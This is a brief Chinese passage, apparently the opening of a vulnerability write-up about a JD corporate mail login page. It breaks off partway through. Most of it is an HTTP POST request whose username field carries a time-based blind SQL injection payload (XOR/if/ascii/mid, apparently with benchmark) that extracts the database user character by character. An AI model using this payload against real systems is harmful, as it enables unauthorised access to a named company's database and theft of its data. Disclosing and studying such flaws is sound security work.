一、首先是一个JD的漏洞。如下
1
2
3
POST https://mail.jd.com/Erpout/Logon.aspx //页面源码为UTF-8
captcha=test&destination=https://mail.jd.com/owa/&flags=0&forcedownlevel=0&isflag=0&isUtf8=1&maindo=mail.jd.com&showCheck=0&trusted=4&txtPassword=test&txtUser=aaaa'XOR(if(ascii(mid(user(),1,1))=106%2cben...